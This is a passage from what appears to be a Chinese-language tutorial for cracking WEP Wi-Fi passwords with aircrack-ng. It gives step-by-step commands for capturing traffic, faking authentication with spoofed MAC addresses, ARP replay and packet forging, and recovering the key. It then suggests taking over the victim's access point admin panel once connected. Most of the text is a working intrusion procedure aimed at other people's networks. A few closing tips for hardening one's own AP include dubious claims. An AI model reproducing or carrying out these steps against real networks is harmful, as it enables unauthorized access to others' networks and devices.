运行命令成功以后，你会看到返回的提示显示出现一个 wifi0这个就是你的用于破解的网卡代号

这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。
如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成 phy1...phy2等等，但是好像最多运行三次，然后就会失败。

3) airodump-ng --ivs -w name -c 6 wifi0
这个命令比较关键，你运行以后，就会列出所有该频道的AP。

其中，6 是指你需要监控的频道，必须和第二个命令里的一样，wifi0是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般低于10就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH这些是加密方式，我们这次只讨论显示为  WEP 和 WEP+ OPN的如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID

过一会，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。

这个窗口就开着好了，不用关闭，以后的命令，需要重新打开一个终端窗口操作。

4）aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wifi0
这一步开始，我们要做一些真正的破解工作，主要是针对那些客户端仅仅连接，没什么流量的AP，这种AP，#Data的增长非常慢，往往需要很长的时间才有可能取得足够的包（一般5位的密码需要10000个包左右，更多的密码就要更多的。。。。）这个时候就需要 aireplay-ng 出面了，顾名思义，这个软件就是 Replay，也就是说，模拟发包。

首先解释命令：
-e ap_essid  就是  -e 之后加上你需要破解的essid ，比如 TP-LINK ， linksys 啥的，注意大小写。
-a ap_mac  就是  -a 之后加上你需要破解的AP的Mac地址，第三步BSSID就可以看得到。
-h XXXXXXXXXX 就是 -h 之后，加上你的无线网卡的 Mac地址， 在第一步你可以得到。
wifi0 ，上面解释过了。
一个样板例子：
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 wifi0

这里有个小的建议，大家可以把以上的命令，都记录在一个文件里，然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉，这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy Paste的方式来输入，这样可以有效防止什么1 和 l ， O和0 的混淆。

这一条命令，是用欺骗的方式，连接上那个AP，因此，如果网络信号不好，可能会执行不成功。如果成功了，那么会显示Successful :>  字样。否则，请让信号强度大于10。

5）aireplay-ng -5 -b ap_mac -h XXXXXXXXXX wifi0
上一条成功以后，我们需要开始收集那些需要的数据包，才能够进行模拟，并且破解。所谓的需要的数据包，就是 #Data的数据，如果 #Data一直是0，那么可能会很麻烦，最好的情况是 #Data缓慢增长的这种情况。

解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址，从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX  就是你自己网卡的Mac地址。
wifi0 和上面一样。。。。。

这一条命令的执行，和#data包有关，如果#Data 没有增加，则这个命令会一直执行，直到捕获一个#Data包。捕获以后，程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功，则会显示成功，失败往往是因为信号太差造成的， 如果攻击失败（往往是捕获的包有问题），程序重试N次以后，或自动重新开始捕捉包，继续进行即可。

等成功完成以后，会显示一个文件名：fragment-XXXXX-XXXXXX.xor这个文件名，XXXXX里面是数字，是一个文件。马上会用得到。

这一步是最有可能失败的一步，尽量保持信号好一点。

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
第六步参数比较多，解释一下：
-a ap_mac 是待破解的AP的Mac地址，
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor  就是第五步显示的那个文件名。
这一步会很快做完， 显示生成文件到 mrarp啥的，其实就是破解包的准备过程。

7) aireplay-ng -2 -r mrarp -x 1024 wifi0
这一步没可以修改的，参数解释一下
wifi0 是 你的无线网卡的名字
1024 是攻击速度，1024是最大值了，如果你的无线网卡不是MiniPCI的，个人建议设为 512 ，这样不容易死机。

当这一步开始执行，你会看到 第一个终端窗口里面，你破解的那个AP后面的  #Data在飞速增长，一般是 200个/s的速度，我们只需等待即可

8）我们可以新打开一个终端窗口，当 #Data达到 10000个的时候，就可以测试破解了，很多密码都可以 10000左右#Data就算出来。
新窗口中运行：
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下，
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件， 如果你多次运行了第三步，那么，可能会生成多个 name-XX.ivs文件， 你可以到对应的文件夹里看一下（就在桌面上的第一个文件夹图标里），找到XX最大的那个，就是你当前正在使用的这个文件。

-n 64 是指破解64位的密码,如果10万以上Data都破解不出来,那就试试 -n 128,估计这个兄弟用了128位加密。

运行以后，如果运气好，一会儿就会显示破解出来的密码，同时会显示 对应的Assic码，如果不是标准Assic码，就是一串数字，记录下来，搞掂。
运气不好的情况，这个程序会继续等待更多的#Data，等到了，就会重新计算一次密码。

小结一下：
本教程只针对 WEP 密码的破解，而且，最好有得到认证的客户端连接在这个AP上，如果没有，有些AP（比如TP-LINK）能够被破解，某些可能就无法破解。


如果你需要你的AP很难被破解，建议：
1）用WPA 加密方式，并且使用不可能被字典猜到的密码，目前还是基本可靠的
2）如果只支持 WEP加密，那么，尽量考虑用隐藏 SSID的方式，这样可以增加破解难度
3）如果只支持 WEP加密，那么，可以考虑使用中文名字作为SSID，这样基本问题不大。
4）一般破解时候，大家都会选择常用的频道，例如 6频道， 第三步显示频道的时候，你的AP也会被列出来，那么第一个目标失败的时候，黑客往往会选择第二个容易下手的目标， 但是如果你选择了8、 4、这些奇怪的频道，那么狠客往往懒得重新进入该频道的监控模式，你就可以逃过一劫。不过， 某些廉价AP，往往对6 频道做了优化，这个频道信号最强....这就没办法了。
5）有空换换你的密码：）

又注：联入网络以后，你可以管理他的AP，进行一些优化啥的，往往AP的密码，可能就是WEP的密码。


补充:
其中第5步:
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX wifi0 可以用新命令替代:
aireplay-ng  -3  -b ap_mac -h XXXXXXXXXX -x  1024  wifi0
这一条命令可以自动地捕捉包,自动的发送包,自动的存为文件.
因此,这一步执行以后,如果开始正确的发收包,则可以看到 Data开始上涨,不过貌似速度会慢一点,用老命令的话,每秒500个增加,用新命令可能只有200个/秒
当足够多的数据包出现以后,可以直接运行第八步,跳过6\7两步.
]]>